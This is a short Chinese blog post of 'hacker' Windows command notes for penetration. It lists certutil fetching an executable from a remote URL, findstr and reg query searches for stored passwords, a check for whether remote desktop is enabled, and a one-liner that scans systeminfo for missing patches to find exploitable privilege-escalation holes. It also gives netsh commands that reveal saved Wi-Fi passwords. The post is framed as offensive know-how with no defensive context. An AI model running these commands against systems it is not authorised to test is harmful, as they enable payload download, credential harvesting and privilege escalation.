IP: 已被记录,请勿违法!

「渗透基础」-黑客常用Windows命令笔记

2020-2-28

load...

如果我有七个小时的时间来砍树,那么我一定会花6个小时来磨我的斧头!



渗透命令:
certutil-----从远程url下载文件

案例:certutil -urlcache -split -f http://baidu.com/test.exe



findstr-----查找文件后缀结果

findstr /s /i "pass" *.py*

reg query HKLM /f password /t REG_SZ /s-----搜集注册表中的各种密码数据



查看有没有开启远程链接,运行下面命令:

REG QUERY "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server" /v fDenyTSConnections

结果:1表示关闭,0表示开启



快速查找未打补丁的exp

systeminfo>bzhack.txt&(for %i in ( KB977165 KB2160329 KB2503665 KB2592799 KB2707511 KB2829361 KB2850851 KB3000061 KB3045171 KB3077657 KB3079904 KB3134228 KB3143141 KB3141780 ) do @type bzhack.txt|@find /i "%i"|| @echo %i you can exp)&del /f /q /a bzhack.txt



常用命令:
ipconfig/all-----网络配置情况

ipconfig /displaydns-----查看本地DNS缓存

netsh wlan show profile-----查看连接过的 wifi 名

netsh wlan show profile WiFi-name key=clear 获取 wifi 对应的的密码

query use
分享至:
good 2

推荐阅读

返回顶部